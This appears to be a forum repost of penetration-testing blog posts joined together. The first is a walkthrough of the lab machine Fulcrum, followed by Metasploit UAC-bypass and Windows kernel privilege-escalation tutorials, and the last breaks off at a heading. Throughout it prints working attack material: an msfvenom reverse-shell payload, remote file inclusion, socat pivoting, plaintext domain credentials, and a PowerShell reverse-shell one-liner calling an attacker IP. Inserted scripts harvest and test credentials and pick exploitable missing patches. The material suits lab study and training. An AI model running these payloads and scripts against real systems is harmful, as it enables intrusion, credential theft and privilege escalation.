05-14-2020, 09:42 AM
Level: Expert
Task: find user.txt and root.txt file on the victim’s machine.
These labs are hosted online and have static IPs; the IP of Fulcrum is 10.10.10.62, so let’s begin with nmap port enumeration.
We need to do a nmap version scan so that we can get better information about the open ports.
nmap -sV -p- 10.10.10.62
From the image below, you can see that ports 4, 22, 80, 88, 9999 and 56423 are open, and that every one of them except 22 (SSH) is served by nginx.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-WhQvoDGkLtw/W5_XaMS6yOI/AAAAAAAAaR4/DFY_wmuMK_MP2aIZwjFi2Eb8XdCOlFS8gCEwYBhgL/s1600/1.png?w=687&ssl=1)
Port 4 is running an nginx server that hosts a web page. Opening it in the browser, we find a page saying the site is under maintenance, along with a link that says “try again”.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-XLrC386evRE/W5_Xdv4OOsI/AAAAAAAAaSA/F2XVpDUfRrUkBhZLkdQ_SMYdOXNnJF9eACEwYBhgL/s1600/2.png?w=687&ssl=1)
Clicking the link takes us to a URL with a page parameter, which turns out to be vulnerable to local file inclusion (LFI).
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-GLu3m520O-Q/W5_Xi9bTAbI/AAAAAAAAaSA/Cbt0xQzeTkYcq_gz5oqLD76lp2eTcd3uQCEwYBhgL/s1600/3.png?w=687&ssl=1)
Back in the nmap scan we also saw that port 80 is running nginx. Opening it in the browser only gives a server error, so this proved to be a dead end.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-X5tuPlDS3L8/W5_XjVkd2EI/AAAAAAAAaSM/mV0vJOVreE86YlkovARy1U7bKKflCBRqwCEwYBhgL/s1600/4.png?w=687&ssl=1)
Let’s try our luck on port 88, which is also running nginx. Opening the IP address on port 88 in the browser, we find a phpMyAdmin login page. As we have no hint or clue for the credentials, we move on to another port.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-TTxEiikeqVc/W5_Xjv9YBsI/AAAAAAAAaSA/WOeCQJuPQkcfRbn6Qhofz6Mf_jRTiycZACEwYBhgL/s1600/5.png?w=687&ssl=1)
Port 9999 is running nginx server, we open the IP address on port 9999 in our browser and find a pfsense login page.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-bcQPXpr5rT8/W5_Xj2xLewI/AAAAAAAAaSE/6KPevOsqSqwdISAbrWH1QZ0jPlYkdjx0wCEwYBhgL/s1600/6.png?w=687&ssl=1)
Port 56423 also runs nginx; visiting it brings us to what appears to be some sort of API endpoint, since we receive a JSON response.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-ZIA0nOBncDA/W5_XjwfLIQI/AAAAAAAAaSA/Dd_N6VMlkxUMOwqkBq7Ls18KsF6japn2QCEwYBhgL/s1600/7.png?w=687&ssl=1)
It is possible that this endpoint is vulnerable to XXE, so we create a PHP shell that we can try to upload to and execute on the target machine.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f raw > shell.php
After creating a shell, we start an HTTP server on our system using python.
python -m SimpleHTTPServer 80
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-YZmoHirkkrc/W5_XkETuNaI/AAAAAAAAaSM/qsS6I4LFw801cITd05p-hgdCj16OXHX6ACEwYBhgL/s1600/8.png?w=687&ssl=1)
After creating the shell, we set up our listener using Metasploit-framework.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.6
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-oVZtP0nyDcc/W5_XkaU3v7I/AAAAAAAAaSI/QK4QSzD3bPQuNI_NQ7rd6p4u5IE05iiJQCEwYBhgL/s1600/9.png?w=687&ssl=1)
Using BurpSuite, we will capture the request, and upload the php shell. But we are unable to get a reverse shell.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-79HXnPyUs6g/W5_XaNh6unI/AAAAAAAAaR4/uv5LrnmODDQT67rhvAyAuoAMcsYpfDxLwCEwYBhgL/s1600/10.png?w=687&ssl=1)
We then go back to the page on port 4 and exploit the page parameter as a remote file inclusion (RFI) instead, pointing it at the shell on our HTTP server, and this time we successfully get a reverse shell.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-_p9eb51dS4c/W5_XaMk7uWI/AAAAAAAAaSA/exTd2ZKMacwwf6CMdjXo8zcLpUfcHXroQCEwYBhgL/s1600/11.png?w=687&ssl=1)
We get a reverse shell, but it is not a proper TTY, so we spawn one using python.
python -c "import pty; pty.spawn('/bin/bash')"
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-Xv4oLu85YEs/W5_XbIyIGoI/AAAAAAAAaR0/cCMQkBhaCdMY7wmkfUvOZnLN439_PIvtACEwYBhgL/s1600/12.png?w=687&ssl=1)
After spawning a TTY shell, we find a file called ‘Fulcrum_Upload_to_Corp.ps1’. Opening it, we find it is a PowerShell script that works with an encrypted password, passing it through a few functions.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-EvZjCL-esBo/W5_Xa0g_L9I/AAAAAAAAaSM/SITV6RyxOawmRThzCPTZPGNC3frHVsNlwCEwYBhgL/s1600/13.png?w=687&ssl=1)
Now we copy the content of the script and paste it into a site (the link is withheld in this copy) in the hope of recovering the logon credentials for the server.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-DdD34NV5jso/W5_XbNRU2qI/AAAAAAAAaR8/L8aHzWw_SYEN6LxXfiWTewQsfpq2HPa5gCEwYBhgL/s1600/14.png?w=687&ssl=1)
Enumerating further into the system, we find a file that contains an interesting internal IP address: 192.168.122.228. We now divert our attention to enumerating this host.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ngxLnoTPeBA/W5_Xbrjv87I/AAAAAAAAaR4/6vdhnPEUQoswXgj-z4COm-bWXBhNDeMBACEwYBhgL/s1600/15.png?w=687&ssl=1)
We scan the ports of this IP address from the compromised host using netcat. When the scan completes, we find that port 5986 (WinRM over HTTPS) is open.
nc -zv 192.168.122.228 1-65535
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-w-EAZhvqY7E/W5_XcGuNCvI/AAAAAAAAaSE/uJ2fw53j04AGNDUVHO3huNdpyx_02FmFwCEwYBhgL/s1600/16.png?w=687&ssl=1)
We download socat onto the target machine. Socat is a very useful tool for pivoting into another network.
cd /tmp
wget [download link withheld in this copy]
./socat tcp-listen:60217,reuseaddr,fork tcp:192.168.122.228:5986 &
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-7U2zsTQcXAQ/W5_Xch7gA2I/AAAAAAAAaSI/hLMj7qAlG9soIy52IJlqrLSSDjWLEaXNgCEwYBhgL/s1600/18.png?w=687&ssl=1)
On our Kali machine we run a second socat that listens on port 5986 and relays to port 60217 on 10.10.10.62, which the first socat forwards on to 192.168.122.228:5986.
socat tcp-listen:5986,reuseaddr,fork tcp:10.10.10.62:60217
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-QRP2yFmblfY/W5_XdPLripI/AAAAAAAAaSE/BqB9yj1FmQMBxsbpbnaGbMJoWEEk1wh9gCEwYBhgL/s1600/19.png?w=687&ssl=1)
We now use PowerShell on our Windows machine to open a remoting session to the Kali relay (192.168.199.130 here), which lands us on the internal host. After connecting, we list the default directory we are in and find a few files called “CheckFileServer.ps1”, “Invoke-PsExec.ps1” and “user.txt”.
Enter-PSSession -ComputerName 192.168.199.130 -Credential $5 -UseSSL -SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck)
dir
type user.txt
type CheckFileServer.ps1
Enumerating the directories under the default IIS directory, we open the web.config file and find LDAP login credentials.
We use them to run an LDAP query for computer objects in the domain and get back two names: DC and FILE. Further queries about these two objects turn up some credentials.
(New-Object adsisearcher((New-Object adsi("LDAP://dc.fulcrum.local","fulcrum\ldap","PasswordForSearch123!")),"(objectCategory=Computer)")).FindAll() | %{ $_.Properties.name }
We cannot make a second PowerShell hop from this session, so we use Invoke-Command with explicit credentials instead: first to read user.txt, which gives us the first flag, and then to launch a PowerShell reverse shell from the file server.
Invoke-Command -ComputerName file.fulcrum.local -Credential fulcrum.local\btables -Port 5985 -ScriptBlock { type C:\Users\btables\Desktop\user.txt }
Invoke-Command -ComputerName file.fulcrum.local -Credential fulcrum.local\btables -Port 5985 -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.14.6',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }
We set up our listener using netcat and get our reverse shell. We check for the available files and find a file called user.txt. We open it and find the first flag.
![[Image: 24.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-WFi5fqfk06s/W5_XgDmSRoI/AAAAAAAAaSA/eSPRudIA7Ho_tmjVMGSb5M0JQWVwnNIoACEwYBhgL/s1600/24.png?w=687&ssl=1)
Now that we have a shell on the file server, we use the credentials found earlier to access the netlogon share on the DC.
net use \\dc.fulcrum.local\netlogon /user:fulcrum\btables ++FileServerLogon12345++
![[Image: 25.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-ew0YQaOrchU/W5_XgrRzKfI/AAAAAAAAaSA/E_8K3OZUvuYUnodxGDdYtTvlCcJIh_yMACEwYBhgL/s1600/25.png?w=687&ssl=1)
On the DC’s netlogon share we find many .ps1 scripts, each containing a set of credentials, which will help us get access to the DC.
![[Image: 26.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-cym9au1ixVQ/W5_XhOh5oBI/AAAAAAAAaSI/FwYjyZYgUWcMxhnXt5r0W3wCVn5Yp_8vwCEwYBhgL/s1600/26.png?w=687&ssl=1)
We write a small script that tests every credential pair found in those files and tells us which one is actually valid.
![[Image: 27.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-aPx4mjmblFM/W5_Xh7O4FqI/AAAAAAAAaR4/WFugUwQdbxI0avR9mM-qfv6EIPAd1tdVACEwYBhgL/s1600/27.png?w=687&ssl=1)
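The page does not show the script it used for this step, so here is an added example (not part of the original walkthrough) of the same idea in PowerShell: pull candidate username/password pairs out of the .ps1 files on the NETLOGON share and test each pair with an LDAP bind against the DC, so that only the valid one is reported. The regexes assume each script sets a plaintext `$pass` and then builds a PSCredential with a `'domain\user'` string; that layout is an assumption, since the real files are not shown, so adjust the patterns to what you see. The share and LDAP paths are the ones used elsewhere on this page, and the script needs PowerShell 3 or later.

```powershell
param(
    [string]$ScriptDir = '\\dc.fulcrum.local\netlogon',
    [string]$LdapPath  = 'LDAP://dc.fulcrum.local'
)

function Get-CredentialCandidates {
    param([string]$Dir)
    # Assumed script layout (not shown on the page; adjust to the real files):
    #   $pass = 'SomePassword' | ConvertTo-SecureString -AsPlainText -Force
    #   $cred = New-Object System.Management.Automation.PSCredential('fulcrum\someuser', $pass)
    $pwRe   = "\`$pass\s*=\s*'([^']+)'"
    $userRe = "PSCredential\('([^']+)'"
    foreach ($file in Get-ChildItem -Path $Dir -Filter '*.ps1' | Where-Object { -not $_.PSIsContainer }) {
        $text = Get-Content -Path $file.FullName -Raw
        $pw   = [regex]::Match($text, $pwRe)
        $user = [regex]::Match($text, $userRe)
        if ($pw.Success -and $user.Success) {
            [pscustomobject]@{
                File     = $file.Name
                User     = $user.Groups[1].Value
                Password = $pw.Groups[1].Value
            }
        }
    }
}

function Test-LdapBind {
    param([string]$Path, [string]$User, [string]$Password)
    try {
        $entry = New-Object System.DirectoryServices.DirectoryEntry($Path, $User, $Password)
        # Reading NativeObject forces the bind; it throws on bad credentials.
        $null = $entry.NativeObject
        return $true
    } catch {
        return $false
    }
}

# Every failed bind counts as a bad-password attempt on the DC, so check the
# lockout policy (net accounts /domain) before trying a long list of candidates.
$candidates = @(Get-CredentialCandidates -Dir $ScriptDir)
"Found $($candidates.Count) credential candidate(s) in $ScriptDir"
$candidates |
    Where-Object { Test-LdapBind -Path $LdapPath -User $_.User -Password $_.Password } |
    Format-Table File, User, Password -AutoSize
```

Run it from the file server shell (where the DC is reachable) and it prints only the pairs that bind successfully; the valid user is the one to pass to Invoke-Command in the next step.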
Now we create a script to get a shell on the domain controller server.
Invoke-Command -ComputerName dc.fulcrum.local -Credential 923a -Port 5985 -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.14.6',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }
![[Image: 28.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-3eRc58xPokQ/W5_XiWc1SmI/AAAAAAAAaSE/gY-NIvvvHSQHCbkhhVDXpNYZqJAMXAppwCEwYBhgL/s1600/28.png?w=687&ssl=1)
When we run the command, a Windows prompt pops up asking for the password of that user. We supply the password our script identified earlier.
We set up the listener and wait for the reverse shell. After getting the reverse shell in c:\Users\Administrator\Desktop we find a file called root.txt, we take a look at the content of the file and find our 2nd flag.
nc -lvp 53
![[Image: 35.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-xty2ZJnu1zU/W5_XjFTMIBI/AAAAAAAAaR8/0Vr47vra3_IroEBXw4m557ISS3TsQE1LQCEwYBhgL/s1600/35.png?w=687&ssl=1)
In this post we shed light on User Account Control, known as UAC. We also look at how it can protect you from malicious software, how ignoring UAC prompts can get your system into trouble, and how an attacker with a low-privilege session can bypass it.
Table of Content
Introduction to UAC
- What is UAC?
- Working of UAC
- Windows Escalate UAC Protection Bypass
- Windows Escalate UAC Protection Bypass (In Memory Injection)
- Windows UAC Protection Bypass (Via FodHelper Registry Key)
- Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
- Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
What is User Account Control?
User Account Control was introduced with Microsoft’s Windows Vista and Windows Server 2008 operating systems to prevent unwanted system-wide changes in a predictable way that requires minimal effort from the user.
In other words, it is a Windows security feature that helps prevent unauthorized modifications to the operating system: UAC makes sure that certain changes are made only with authorization from an administrator. If the administrator does not approve a change, it is not executed and Windows remains unchanged.
How does UAC work?
UAC works by preventing a program from carrying out tasks that change the system unless the process attempting them is running with administrator rights. A program run as administrator is “elevated” and has more privileges than programs that are not running as administrator.
Some things which cannot be done without administrator rights:
- Registry modifications to machine-wide keys such as those under HKEY_LOCAL_MACHINE (they affect more than one user, so without elevation they are read-only)
- Loading a device driver
- DLL injection
- Modifying system time (clock)
- Modifying User Account Control settings (via Registry, it can be enabled/disabled but you need the correct privileges to do this)
- Modify protected directories (e.g. Windows folder, Program Files)
- Scheduled tasks (e.g. to auto-start with administrator privileges)
Techniques
First, exploit the target machine to obtain a Meterpreter session. Once you have Meterpreter session 1, type the following commands to check what authority and privileges you have.
getsystem
getuid
If you do not have SYSTEM or administrator privileges, the next step is to bypass the UAC protection of the target.
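Before running any of the bypassuac modules below, it is worth checking the conditions they depend on. The following PowerShell snippet is an added example, not part of the original post: it reads the documented UAC policy values from the registry and uses whoami to tell whether the current user is a local administrator whose token has been filtered (the situation a UAC bypass addresses), is already elevated, or is not an administrator at all (in which case no UAC bypass will help). It only relies on the standard registry value names and on the whoami /groups output; the one assumption is an English locale for the “deny only” wording.

```powershell
function Get-UacPosture {
    # Documented UAC policy values; a missing value means the Windows default.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $pol = Get-ItemProperty -Path $key

    # whoami lists every group in the token, including the ones marked
    # "Group used for deny only", which is exactly how a filtered admin token
    # looks. (English locale assumed for that wording.)
    $groups   = whoami /groups /fo csv | ConvertFrom-Csv
    $adminRow = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }   # BUILTIN\Administrators
    $label    = ($groups | Where-Object { $_.'Group Name' -like 'Mandatory Label\*' }).'Group Name'

    [pscustomobject]@{
        EnableLUA                  = $pol.EnableLUA                  # 0 = UAC disabled entirely
        ConsentPromptBehaviorAdmin = $pol.ConsentPromptBehaviorAdmin # 2 = Always notify, 5 = default, 0 = never prompt
        PromptOnSecureDesktop      = $pol.PromptOnSecureDesktop
        LocalAdminMember           = [bool]$adminRow
        TokenFiltered              = [bool]$adminRow -and ($adminRow.Attributes -match 'deny only')
        IntegrityLabel             = $label                          # Medium = filtered, High = elevated
    }
}

$p = Get-UacPosture
$p | Format-List

if ($p.EnableLUA -eq 0) {
    'UAC is disabled: an admin user already gets a full token, run getsystem directly.'
} elseif (-not $p.LocalAdminMember) {
    'Not a local administrator: a UAC bypass cannot elevate this user, look for a real privilege escalation instead.'
} elseif (-not $p.TokenFiltered) {
    'Token is already elevated (High integrity): no bypass needed.'
} elseif ($p.ConsentPromptBehaviorAdmin -eq 2) {
    'UAC is at "Always notify": the auto-elevation tricks (fodhelper, eventvwr) prompt instead of silently elevating.'
} else {
    'Filtered admin token at the default UAC level: the bypassuac modules are applicable.'
}
```

The last branch is the only one where the modules below do what the post describes; the Metasploit modules perform the same checks themselves and refuse to run at “Always notify” or for a non-admin user, so running this first saves a round of failed attempts.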
Windows Escalate UAC Protection Bypass
This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.
msf > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > exploit
From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.
getsystem
getuid
Great!! Here we got NT AUTHORITY\SYSTEM privileges; if you now type the “shell” command, you get a command prompt with administrator privileges.
![[Image: 1.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-MLj6M5z9x50/W53gwey6pSI/AAAAAAAAaPU/W9QdjuMLjK4xkp-t9OT-QruLs9KQOjVPACLcBGAs/s1600/1.png?w=687)
Windows Escalate UAC Protection Bypass (In Memory Injection)
This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set session 1
msf exploit(windows/local/bypassuac_injection) > exploit
From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.
getsystem
getuid
Ultimately you get NT AUTHORITY\SYSTEM privileges; if you now run the “shell” command, you get a command prompt with administrator privileges.
![[Image: 3.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-wtjO0vwANDs/W53gwu8_-bI/AAAAAAAAaPY/b0SmuIsr6HAU_O6hSArtTi_BEO3YQojPQCLcBGAs/s1600/3.png?w=687)
Windows UAC Protection Bypass (Via FodHelper Registry Key)
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session 1
msf exploit(windows/local/bypassuac_fodhelper) > exploit
From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.
getsystem
getuid
Great!! Here we got NT AUTHORITY\SYSTEM privileges; if you now type the “shell” command, you get a command prompt with administrator privileges.
![[Image: 4.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-iH5Inc5GTg4/W53gw36Bo3I/AAAAAAAAaPc/PQpLFtETqMUEZrF-efd7TS6LMW9VGiDXwCEwYBhgL/s1600/4.png?w=687)
Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > set session 1
msf exploit(windows/local/bypassuac_eventvwr) > exploit
From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.
getsystem
getuid
And again you will get NT AUTHORITY\SYSTEM Privilege.
![[Image: 5.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-enb14J_C8LA/W53gxPsr1DI/AAAAAAAAaPg/g2EUJutqTmM7MOYKK5gZDk-qXSWb9HMewCEwYBhgL/s1600/5.png?w=687)
Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation. This module requires the architecture of the payload to match the OS, but the current low-privilege Meterpreter session architecture can be different. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. This module invokes the target binary via cmd.exe on the target. Therefore if cmd.exe access is restricted, this module will not run correctly.
msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set session 1
msf exploit(windows/local/bypassuac_comhijack) > exploit
From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.
getsystem
getuid
Finally, you get NT AUTHORITY\SYSTEM privileges; running the “shell” command again gives a command prompt with administrator privileges. This is how the Metasploit local exploit modules can be used to bypass UAC protection.
![[Image: 6.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-E9UGfeePMbA/W53gxgN00NI/AAAAAAAAaPk/tsVTjUcnXJgqZKhdFGvE5p6t-WwUXDo-ACEwYBhgL/s1600/6.png?w=687)
Hello Friends!! In our previous article (link withheld in this copy) we discussed “Vectors of Windows Privilege Escalation using the automated script”, and today we demonstrate Windows privilege escalation via kernel exploitation. For this purpose we use a built-in Metasploit module known as the Local Exploit Suggester. The objective of this suggester is to identify which parts of a system may be exploitable and to give us a list of the best-matching local exploits, which can then be used to elevate privileges.
Table of content
- Windows-Exploit-suggester
- Windows ClientCopyImage Win32k Exploit
- Windows TrackPopupMenu Win32k NULL Pointer Dereference
- Windows SYSTEM Escalation via KiTrap0D
- Windows Escalate Task Scheduler XML Privilege Escalation
- MS16-016 mrxdav.sys WebDav Local Privilege Escalation
- EPATHOBJ::pprFlattenRec Local Privilege Escalation
- MS13-053: NTUserMessageCall Win32k Kernel Pool Overflow
- MS16-032 Secondary Logon Handle Privilege Escalation
- RottenPotato
The Metasploit in-built module suggests various local exploits that can be used to perform Privilege escalation and provides a suggestion based on the architecture, platform (i.e the operating system it’s being run on), session type and required default options. It saves our time as we don’t have to manually search around for local exploits until none of the options provided works.
It is also important to note that not all of the listed local exploits will necessarily work.
Usage
Note: For using the local exploit suggester, we must already have a Meterpreter session opened for our target machine. However, before running the Local Exploit suggester we need to put our existing active Meterpreter session to the background (CTRL + Z)
Below is the example of the same, let’s say our existing active Meterpreter session is 1
use post/multi/recon/local_exploit_suggester
set LHOST 192.168.1.107
set SESSION 1
exploit
As you can see, it has suggested several local exploits the target appears to be vulnerable to, each of which can provide a higher-privilege shell.
![[Image: 0.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-na8X7n-ydJE/W5X9dDvIgoI/AAAAAAAAaMc/IT2GTlae1xgJXD-7wuDlItWe5ji5enMPACEwYBhgL/s1600/0.png?w=687)
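Because some of the exploits below can take the box down (the MS13-053 module notes that winlogon.exe is likely to crash), it pays to cross-check the suggester’s list against what the target actually has installed before firing anything. The following PowerShell script is an added example, not part of the original post: run in a shell on the target, it compares the hotfixes Windows reports as installed with the original bulletin KBs for the exploits covered in this post, and also reports the two preconditions the text mentions (kitrap0d is x86-only; ms16_032 needs two or more cores). The KB numbers are the ones from the corresponding Microsoft bulletins. A KB that is absent does not prove the bug is present, since later cumulative updates supersede these KBs without listing them, so treat a “missing” row as a candidate to try, not as confirmed vulnerable. It needs PowerShell 3 or later; on PowerShell 7 replace Get-WmiObject with Get-CimInstance.

```powershell
# Bulletin -> original KB -> Metasploit module(s) from this post.
$bulletins = @(
    @{ Bulletin = 'MS10-015'; KB = 'KB977165';  Modules = 'ms10_015_kitrap0d (x86 only)' }
    @{ Bulletin = 'MS10-092'; KB = 'KB2305420'; Modules = 'ms10_092_schelevator' }
    @{ Bulletin = 'MS13-053'; KB = 'KB2850851'; Modules = 'ms13_053_schlamperei, ppr_flatten_rec' }
    @{ Bulletin = 'MS14-058'; KB = 'KB3000061'; Modules = 'ms14_058_track_popup_menu' }
    @{ Bulletin = 'MS15-051'; KB = 'KB3045171'; Modules = 'ms15_051_client_copy_image' }
    @{ Bulletin = 'MS16-016'; KB = 'KB3136041'; Modules = 'ms16_016_webdav' }
    @{ Bulletin = 'MS16-032'; KB = 'KB3143141'; Modules = 'ms16_032_secondary_logon_handle_privesc (2+ cores)' }
)

function Get-PatchCandidates {
    param([string[]]$InstalledKBs)
    foreach ($b in $bulletins) {
        [pscustomobject]@{
            Bulletin  = $b.Bulletin
            KB        = $b.KB
            Installed = ($InstalledKBs -contains $b.KB)
            Modules   = $b.Modules
        }
    }
}

$os  = Get-WmiObject Win32_OperatingSystem
$cs  = Get-WmiObject Win32_ComputerSystem
$kbs = Get-HotFix | Select-Object -ExpandProperty HotFixID

# Architecture and core count decide which of the candidates are even eligible.
'{0} build {1}, {2}, {3} logical processors' -f $os.Caption, $os.BuildNumber, $os.OSArchitecture, $cs.NumberOfLogicalProcessors

# Rows whose KB is not listed are the candidates to try first.
Get-PatchCandidates -InstalledKBs $kbs |
    Where-Object { -not $_.Installed } |
    Format-Table Bulletin, KB, Modules -AutoSize
```

Use the output together with the suggester: a module that is both suggested and whose KB is missing is the best first candidate, and one whose KB is present is worth skipping even if the suggester lists it, since a failed kernel exploit is rarely free.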
Windows ClientCopyImage Win32k Exploit
Vulnerabilities in Windows Kernel-Mode Drivers could allow elevation of privilege. This module exploits improper object handling in the win32k.sys kernel mode driver.
This module has been tested on vulnerable builds of Windows 7 x64 and x86, Windows 2008 R2 SP1 x64.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms15_051_client_copy_image
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
As we can see, we are now running as the privileged Windows user NT AUTHORITY\SYSTEM.
![[Image: 1.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-hz_b--b-J58/W5X9dN3MTDI/AAAAAAAAaNQ/zlcnw5C4xBcI5knhNQbzI33PbF4dJ-WgACEwYBhgL/s1600/1.png?w=687)
Windows TrackPopupMenu Win32k NULL Pointer Dereference
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution.
This module has been tested on Windows XP SP3, Windows Server 2003 SP2, Windows 7 SP1 Windows Server 2008 32bits and Windows Server 2008 R2 SP1 64 bits.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms14_058_track_popup_menu
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
As we can see, we are now running as the privileged Windows user NT AUTHORITY\SYSTEM.
![[Image: 2.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-PkWBUa6gBt0/W5X9eP4yJlI/AAAAAAAAaNg/3ObWMMVKhrsv5kCj1cN58zmdNWdB175YgCEwYBhgL/s1600/2.png?w=687)
Windows SYSTEM Escalation via KiTrap0D
This module will create a new session with SYSTEM privileges via the KiTrap0D exploit. If the session in use is already elevated, the exploit will not run. The module relies on kitrap0d.x86.dll and is not supported on x64 editions of Windows.
This module has been tested on vulnerable builds of Windows Server 2003, Windows Server 2008, Windows 7, XP for 32-bit Systems.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms10_015_kitrap0d
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
As we can see, we are now running as the privileged Windows user NT AUTHORITY\SYSTEM.
![[Image: 3.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-WwQmpHxalZg/W5X9eeDovpI/AAAAAAAAaNc/qjBIxBGwPTAfhcB13aUc8ul2rErH9NmgwCEwYBhgL/s1600/3.png?w=687)
Windows Escalate Task Scheduler XML Privilege Escalation
